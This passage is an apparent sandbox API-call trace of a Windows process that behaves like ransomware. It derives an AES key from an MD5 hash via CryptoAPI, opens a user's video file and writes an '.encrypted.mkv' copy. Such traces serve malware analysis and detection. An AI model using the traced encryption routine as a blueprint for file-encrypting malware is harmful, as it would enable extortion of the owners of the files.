lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.465] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.465] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0043.465] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.465] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.465] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0043.465] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.465] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0043.465] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0043.465] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.466] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.466] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0043.466] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0043.466] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0043.466] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.466] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.466] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.466] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.466] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0043.466] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0043.466] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0043.466] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.466] CryptCreateHash (in: hProv=0x7d5c40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0043.466] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.466] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.466] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.466] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.466] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0043.466] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.467] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.467] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.467] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0043.467] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.467] CryptHashData (hHash=0x7c2240, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0043.467] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.467] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.467] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.467] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.467] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0043.467] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0043.467] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0043.467] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.467] CryptDeriveKey (in: hProv=0x7d5c40, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2280) returned 1 [0043.467] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.467] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.467] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.467] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.467] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.467] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.468] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0043.468] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.468] CryptDestroyHash (hHash=0x7c2240) returned 1 [0043.468] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.468] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.468] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.468] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.468] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.468] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Dzrcf9Vo2bS-.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b\\ooaw\\dzrcf9vo2bs-.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0043.469] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.469] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0043.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0043.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0043.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0043.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0043.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0043.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0043.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0043.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0043.469] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0043.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0043.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0043.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0043.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0043.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0043.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0043.469] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0043.469] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0043.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0043.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0043.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0043.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0043.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0043.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0043.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0043.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0043.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0043.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0043.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0043.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0043.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0043.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0043.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0043.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0043.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0043.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0043.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0043.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0043.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0043.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0043.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0043.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0043.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0043.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0043.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0043.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb0) returned 0x7c5810 [0043.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0043.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db378 [0043.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0043.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db300 [0043.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5810 | out: hHeap=0x770000) returned 1 [0043.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0043.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0043.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0043.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0043.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0043.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0043.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0043.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0043.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0043.471] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0043.471] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0043.471] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b\\ooaw")) returned 0x10 [0043.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0043.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0043.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db300 | out: hHeap=0x770000) returned 1 [0043.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0043.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0043.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0043.471] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0043.471] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0043.471] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0043.471] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0043.471] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Dzrcf9Vo2bS-.encrypted.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b\\ooaw\\dzrcf9vo2bs-.encrypted.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0043.472] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0043.472] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0043.472] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0043.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0043.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0043.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0043.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0043.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0043.472] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.472] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0043.472] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0043.472] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0043.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0043.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0043.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0043.472] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0043.472] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0043.472] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.472] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0043.473] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0043.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0043.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0043.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0043.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0043.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0043.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0043.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0043.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0043.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0043.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0043.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0043.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0043.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0043.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0043.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0043.473] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0043.473] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x79a3, lpOverlapped=0x0) returned 1 [0043.475] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0043.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0043.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0043.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0043.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0043.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x79a3) returned 0xac2018 [0043.476] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0043.476] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0043.476] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0043.476] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0043.476] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0043.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0043.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x79a3) returned 0xac99c8 [0043.477] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0043.477] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0043.477] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.477] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0043.477] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0043.477] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0043.477] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0043.477] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0043.477] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x79a3) returned 0xac2018 [0043.477] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0043.477] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0043.477] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0043.477] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0043.477] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0043.477] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0043.477] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.477] 